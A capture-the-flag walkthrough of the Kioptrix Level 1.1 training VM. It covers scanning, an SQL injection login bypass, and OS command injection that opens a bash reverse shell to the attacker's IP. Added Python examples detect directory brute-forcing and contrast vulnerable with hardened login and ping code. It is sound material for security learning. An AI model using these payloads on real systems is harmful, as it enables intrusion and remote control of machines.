KIOPTRIX: LEVEL 1.1 (#2) walkthrough

The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player 😜). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There is more than one way to successfully complete the challenges.


Discovery

Find the vulnerable machine with the netdiscover tool. We have to do this because we do not know which IP address was assigned to it.


Enumeration

“Know the Enemy and Know Yourself” 🔎

I always run the Nmap scan against all ports (-p-), because we have to be sure we do not miss any minor detail.

sudo nmap -p- -T4 -A 192.168.103.143


More Enumeration 💕

  • 22|SSH
Only user enumeration is available.
  • 80|HTTP
  1. Look at the website and its source code.
We can see a login portal.

The first thing that comes to my mind when I see a login portal is SQLi 👻. Then I might try default passwords such as admin:admin, admin:password, root:root. 🤔

We got a username: ‘Administrator’ 🧙🏻‍♂️

2. Always run Nikto alongside Gobuster and dirb.

The server banner is Apache/2.0.52 (CentOS) + PHP/4.3.9; the results below are based on Apache/2.0.52.

Possible ones to check are:

  • Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution🤔
  • Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak🤔

gobuster dir -f -x php,html,txt -t 100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.103.143 -n -q -e
dirb http://192.168.103.143 -N 403 -r
  • 111|rpcbind
No notable services are registered with RPC.
  • CUPS 1.1
No useful information 😵 (searchsploit output).
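The Gobuster and dirb runs above leave a very distinctive trace on the server side: one client producing a burst of 404 responses in seconds. The following detector, added here as an example and not part of the walkthrough or of Kioptrix, parses Apache combined-format access-log lines and flags any client that produces `threshold` or more 404s inside a sliding window of `window` seconds. The log lines are constructed for the example; the addresses reuse the attacker and target IPs from this walkthrough.

```python
"""
Added example, not part of the walkthrough: a detector for the directory
brute-forcing that gobuster and dirb generate against port 80. It parses
Apache combined-format access-log lines and flags any client that produces
`threshold` or more 404 responses inside a `window`-second sliding window.
The log lines below are constructed; the attacker and target addresses reuse
the ones from this walkthrough.
"""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one normal visitor (.50) and one wordlist scanner (.182)
# hitting non-existent paths in quick succession.
SAMPLE_LOG = """\
192.168.103.50 - - [10/Mar/2021:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.103.182 - - [10/Mar/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512
192.168.103.182 - - [10/Mar/2021:10:00:01 +0000] "GET /admin.php HTTP/1.1" 404 211
192.168.103.182 - - [10/Mar/2021:10:00:01 +0000] "GET /backup.txt HTTP/1.1" 404 211
192.168.103.182 - - [10/Mar/2021:10:00:02 +0000] "GET /test.html HTTP/1.1" 404 211
192.168.103.182 - - [10/Mar/2021:10:00:02 +0000] "GET /login.php HTTP/1.1" 404 211
192.168.103.182 - - [10/Mar/2021:10:00:03 +0000] "GET /uploads/ HTTP/1.1" 404 211
192.168.103.182 - - [10/Mar/2021:10:00:03 +0000] "GET /cgi-bin/ HTTP/1.1" 403 211
192.168.103.50 - - [10/Mar/2021:10:00:30 +0000] "GET /missing.png HTTP/1.1" 404 211
"""


def parse_line(line: str):
    """Return (client_ip, timestamp, status) or None for lines that don't match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], datetime.strptime(m["ts"], TS_FMT), int(m["status"])


def flag_scanners(lines, threshold: int = 5, window: int = 60) -> set:
    """Return the set of client IPs with >= threshold 404s inside any window."""
    not_found = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[2] == 404:
            not_found[parsed[0]].append(parsed[1])
    flagged = set()
    for ip, stamps in not_found.items():
        stamps.sort()
        lo = 0
        for hi, ts in enumerate(stamps):
            # Slide the window start forward until it spans <= window seconds.
            while (ts - stamps[lo]).total_seconds() > window:
                lo += 1
            if hi - lo + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


if __name__ == "__main__":
    print("suspected directory brute-force from:",
          flag_scanners(SAMPLE_LOG.splitlines()))
```

The threshold and window are deliberately conservative; a single user following a few dead links will not trip five 404s in a minute, while a wordlist scanner reaches that in its first second. In practice the same sliding-window logic is applied over the live log, and a hit is a good reason to look at which paths were requested.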

Exploring Exploits

“Can you imagine what I would do if I could do all I can?” — Sun Tzu 🧙🏻‍♂️

I have listed all the possible points of attack from the previous steps.

  • Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
  • Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak
  • SQLi

Let’s try one by one 🤓…

  1. Apache + PHP < 5.3.12 / < 5.4.2 — cgi-bin Remote Code Execution
PHP 4 is not affected 😩

2. Apache < 2.2.34 / < 2.4.27 — OPTIONS Memory Leak

No luck here as well…😩

3. SQLi

  • Creds: Administrator:' OR 1 -- -

It looks like we can go for OS command injection. Let’s try 8.8.8.8;ls as the input.

This confirms that bash exists on the target.

Payload : 8.8.8.8 && bash -i >& /dev/tcp/192.168.103.182/4444 0>&1

Got the shell ;p 😍
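Both weaknesses used above come down to the same root cause: user input is concatenated into something that gets interpreted (an SQL statement in the login form, a shell command line in the IP-address field). The following is an added example, not code from the walkthrough or from Kioptrix itself, showing each bug as a vulnerable function next to its hardened form. The users table, the credential value, and all function names are constructed for illustration; the real application is PHP and is not reproduced here, and `echo` stands in for the `ping` binary so the block runs offline.

```python
"""
Added example, not code from the walkthrough or from Kioptrix itself: the two
weaknesses exploited above (SQL injection in the login form and OS command
injection in an IP-address field), each as a vulnerable function next to a
hardened one. The users table, the credential value and all function names are
constructed for illustration; the real application is PHP and is not
reproduced here.
"""
import ipaddress
import sqlite3
import subprocess


def make_db() -> sqlite3.Connection:
    # Constructed in-memory database with a single account.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Administrator', 'S3cretPass!')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Vulnerable: the inputs are spliced into the SQL text. A password of
    #   ' OR 1 -- -
    # closes the string literal, ORs in a tautology and comments out the rest,
    # so the query matches without the real password being known.
    query = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Hardened: bound parameters keep the inputs as data, so the same payload is
    # just a password string that matches no row. (A real application would also
    # store and compare password hashes rather than plaintext.)
    row = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] > 0


def is_ip_address(value: str) -> bool:
    # Strict allow-list check: anything that is not a bare IPv4/IPv6 literal
    # is rejected, which rules out ';', '&&', '|' and whitespace outright.
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def ping_vulnerable(target: str) -> str:
    # Vulnerable: shell=True hands the whole string to /bin/sh, so a ';' or '&&'
    # in the input starts a second command. "echo" stands in for the ping binary
    # so the example runs offline; the injection behaves the same either way.
    result = subprocess.run(f"echo PING {target}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def ping_hardened(target: str) -> str:
    # Hardened: validate first, then pass an argument vector with no shell in the
    # path, so metacharacters are never interpreted even if validation were
    # loosened later.
    if not is_ip_address(target):
        raise ValueError(f"rejected input: {target!r}")
    result = subprocess.run(["echo", "PING", target], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    db = make_db()
    bypass = "' OR 1 -- -"
    print("vulnerable login with injected password:", login_vulnerable(db, "Administrator", bypass))  # True
    print("hardened login with injected password:  ", login_hardened(db, "Administrator", bypass))    # False
    print(ping_vulnerable("8.8.8.8; echo INJECTED"), end="")  # second line "INJECTED" shows the extra command ran
    try:
        ping_hardened("8.8.8.8; echo INJECTED")
    except ValueError as exc:
        print("hardened ping:", exc)
```

The two fixes are independent and both are worth having: parameterised queries make the SQL fix structural rather than input-dependent, and for the command case the argument vector is the real protection, with the IP-address check as a second layer that also gives you a clean place to log rejected input.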

Privilege Escalation

“There are not more than five musical notes, yet the combinations of these five give rise to more melodies than can ever be heard. There are not more than five primary colors, yet in combination they produce more hues than can ever be seen. There are not more than five cardinal tastes, yet combinations of them yield more flavors than can ever be tasted.” — Sun Tzu 🧙🏻‍♂️

Enumeration

Use the information gathered above to find a matching kernel exploit.

Transfer the file to the Vuln machine…👻

Rooted❤️

“If the mind is willing, the flesh could go on and on without many things.”— Sun Tzu